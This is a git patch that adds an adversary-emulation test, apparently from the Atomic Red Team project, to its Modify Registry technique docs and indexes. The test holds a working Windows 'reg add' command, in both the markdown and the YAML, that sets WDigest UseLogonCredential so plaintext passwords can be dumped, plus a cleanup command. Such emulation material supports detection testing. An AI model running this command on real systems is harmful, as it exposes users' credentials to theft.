From ff779dd2fb609c7d16a12fc400794f83ffbaf1f9 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Tue, 17 Sep 2019 14:45:16 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master
---
 atomics/T1112/T1112.md | 22 ++++++++++++++++++++++
 atomics/index.md | 1 +
 atomics/index.yaml | 17 +++++++++++++++++
 atomics/windows-index.md | 1 +
 4 files changed, 41 insertions(+)
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index dac4677b..3a4d075f 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -16,6 +16,8 @@ The Registry of a remote system may be modified to aid in execution of files as
 - [Atomic Test #3 - Modify Registry of Another User Profile](#atomic-test-3---modify-registry-of-another-user-profile)
+- [Atomic Test #4 - Modify registry for password downgrade to plain text](#atomic-test-4---modify-registry-for-password-downgrade-to-plain-text)
+
@@ -116,4 +118,24 @@ reg unload "HKU\$($ProfileList[$p].SID)"
+
+
+
+## Atomic Test #4 - Modify registry for password downgrade to plain text
+Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+```
+reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+```
+
+
+#### Cleanup Commands:
+```
+reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
+```
+
diff --git a/atomics/index.md b/atomics/index.md
index 567f2776..01aadace 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -282,6 +282,7 @@
 - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
 - Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
 - Atomic Test #3: Modify Registry of Another User Profile [windows]
+ - Atomic Test #4: Modify registry for password downgrade to plain text [windows]
 - [T1170 Mshta](./T1170/T1170.md)
 - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 8e6d4189..4be6525f 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -8156,6 +8156,23 @@ defense-evasion:
 ### Garbage collection and closing of ntuser.dat ###
 [gc]::Collect()
 reg unload "HKU\$($ProfileList[$p].SID)"
+ - name: Modify registry for password downgrade to plain text
+ description: "Sets registry key that will tell windows to store plaintext passwords
+ (making the system vulnerable to clear text / cleartext password dumping)
+ \n"
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
+ /v UseLogonCredential /t REG_DWORD /d 1 /f
+
+'
+ cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
+ /v UseLogonCredential /t REG_DWORD /d 0 /f
+
+'
 T1170:
 technique:
 external_references:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 1db34349..6a31951f 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -89,6 +89,7 @@
 - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
 - Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
 - Atomic Test #3: Modify Registry of Another User Profile [windows]
+ - Atomic Test #4: Modify registry for password downgrade to plain text [windows]
 - [T1170 Mshta](./T1170/T1170.md)
 - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)